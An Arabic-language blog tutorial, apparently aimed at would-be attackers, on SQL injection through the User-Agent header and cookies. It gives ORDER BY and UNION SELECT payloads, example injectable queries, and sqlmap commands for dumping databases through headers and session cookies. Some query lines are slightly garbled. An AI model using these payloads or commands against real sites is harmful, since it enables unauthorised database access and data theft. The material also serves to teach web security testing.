4chieve THE T4RG3T /Advanced Sql injetcion through http Header + Cookies

السلام عليكم ورحمة الله وبركاتة،


اليوم في شرحنا اليوم لايغيب عن بعض الناس ولكن البعض لايعلم عنه وهو استغلال الثغرات السيكول من خلال useragent, cookies



في العادة بعض المخترقين يقومون بفحص الهدف من خلال المتغيرات سواء كان الاستعلام او الطلب من
خلال GET,POST,HEAD في المتغيرات الواضحه في الصفحه، مثال.
اقتباس:
example.com/site.php?id=2 AND 1=1--+-
في العاده نقوم بفحص المتغير [id] من ثغرات السيكول ونكفتي بذالك ولكن هناك احتماليه بأن ن يكون اليوزر ايجنت والكوكيز مصاب لنه كلن منهم متغير. في الاول ناخذ تعريف بسيط ماهو USERAGENT, COOKIE

Useragent:هو المعرف لدى الويب ابلكيشن من حيث نوع الجهاز والمتصفح المستخدم للعميل مثال لليوزر ايجنت مثال

كود PHP:
User-AgentMozilla/5.0 (MacintoshIntel Mac OS X 10.7rv:31.0Gecko/20100101 Firefox/31.0 


حدوث الخطاء عندما يكون صاحب الموقع او السيرفر بحفظ نسخه معرف العميل"User-agent" في قاعدة بيانات ولكن حدوثها قليل من خلال الهيدر والكوكيز ولكن في بعض الاحيان فعاله خاصة في برمجيات Asp




طيب خلونا ناخذ مثال.



كود PHP:
 QuerySELECT FROM users WHERE ua='User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.7; rv:31.0) Gecko/20100101 Firefox/31.0' AND 1=--+- NU11


كما تلاحظون وجود خطا سيكول في الموقع.

استخراج عدد الاعمده بحكم انها بيسد
كود PHP:
' order by 1 -- +
query: SELECT * FROM users WHERE ua='User-AgentMozilla/5.0 (MacintoshIntel Mac OS X 10.7rv:31.0Gecko/20100101 Firefox/31.0' ORDER BY 1 -- +' 
استخراج
الاعمدة المصابة

كود PHP:
' UNION SELECT 1,2,3,4,5,6,7,8 limit 1,1 -- + 
كود PHP:
querySELECT FROM users WHERE ua='User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.7; rv:31.0) Gecko/20100101 Firefox/31.0' UNION SELECT 12345678 LIMIT 1-- +
او يمكنكم استخدام اداة بالاستغلال الاوتماتيكي من خلال اداة Sqlmap من خلال امر
كود PHP:
python sqlmap.py -'http://website.com/useragent/ --level 3 --dbs 
عندما نرفع مستوى الحقن في السيكول ماب يقوم بالتجربه على User-agent/ Http header

-------------------------------------------------------------------------------------

الان نتجه الى الحقن عن طريق الكوكيز. في البدايه يمكنك الحقن من خلال اضافه فايرفوكس cookeis manger+ وايضا tamper Data + Sqlmap

بالاول خلونا نخاذ عن طريق CookiesManger+

نفتح الاضافه من الفايرفوكس ومن ثم نقوم بالبحث عن الموقع المصاب.



ثم نقوم بالتعديل على المحتوى من خلال EDIT >>> Content



والنتيجه


وايضا من خلال tamperdata

نقوم بستقطاع الطلب ومن ثم نقوم بتعديل على الكوكيز:



والطريقه الاخيره من خلال الستغلال الاتوماتيكي السيكول ماب من خلال امر.
كود PHP:
./sqlmap.py -'http://exme.com/vcat3.php?id=37#' --cookie='PHPSESSID=0e4jfbrgd8190ig3uba7rvsip1; security=low' -- --dbs --level 3 -p PHPSESSID -risk 2 


وهاذا والصلاة والسلام ع اشرف الخلق والمرسلين. واعتذر على التأخر واتمنى ان يكون الشرح مفيد دمتم في حفظ الله.

تعليقات

إرسال تعليق

المشاركات الشائعة من هذه المدونة

CRLF injection [\r\n Carriage Return]

صورة
السلام عليكم ورحمة الله وبركاتة , .  في البداية ناخذ تعريف عن معنى CRLF CRLF   CR=Carriage Return   %0d 0x0D \r LF=Line feed 0x0A %0a \n ماهو crlf عندما يقوم شخص بارسال طلب من المتصفح الى السيرفر  السيرفر راح يرد بالريسبونس يحتوي على  http response headers content Carriage Return Line feed تستخدم في ملاحظه انتهاء الاين او السطر و كما نلاحظ طريقه الفصل بين Header مع الContent Carriage Return&line feed لكن تختلف من ويندوز الى لينكس  حيث الويندوز يتطلب  بانتهى السطر با crlf في بروتوكول http/https اما في لينكس  line feed  lf يتطلب  فقط في بروتوكول الhttp  اين تكمن الثغرة: الثغرة تكمن عندما يضع المبرمج مدخل يستطيع المخترق او المستخدم بالتحكم في response header مثال من بعض الامثله التحكم في الوق مثلا الان وقت الاسغلال والتصعيد من بعض خطورة crlf ممكن التصعيد الى xss ,Session Fixation,openredirect ايضا ممكن rce على حسب المحتوى من خطوره crsf م...
قراءة المزيد

Study in Nosql-Injection-Mongodb

صورة
السلام عليكم ورحمة الله وبركاتة، موضوع المقال اليوم عن حقن النو سكيول في قواعد Mongodb مع بعض الامثله بينها وبين  للتوضيحMysql ,سوف احاول قدر المستطاع ابسط الموضوع مع ذكر اهم الاجزاء في الثغرة. في البداية ناخذ تعريف عن  NOSQL  nosql هي قاعدة بيانات ولكن لا تعتمد على لغة محدده في الاستعلام مثل mysql حيث الاستعلام في mysql يكون ب»لغة "Structured Query Language"   اما في نظيرتها nosql في mongodb Document - Oriented language بحيث انه يقوم بحفظ الوثائق بترميز bson في الجدول المعين او collection من ثم ارسال الطلب من بعدserialzation الى المستخدم سوا كان الترميز   content-type json format or html/-text/plain صوره للتوضيح   وهنا فرق json عن bson في ترميز mongodb  لنفرض وجدنا موقع يطبع ريكوست جيسون ل mongodb  يحتوي على hello world mongodb يقوم بقراءه hello world هاكذا الاختلافات واضحه وصريحه ولكن في تشابه في الية العمل الى حد ما لناخذ امثله mysql+nosql ونقارنهم حتى يتبين  لنا الية ...
قراءة المزيد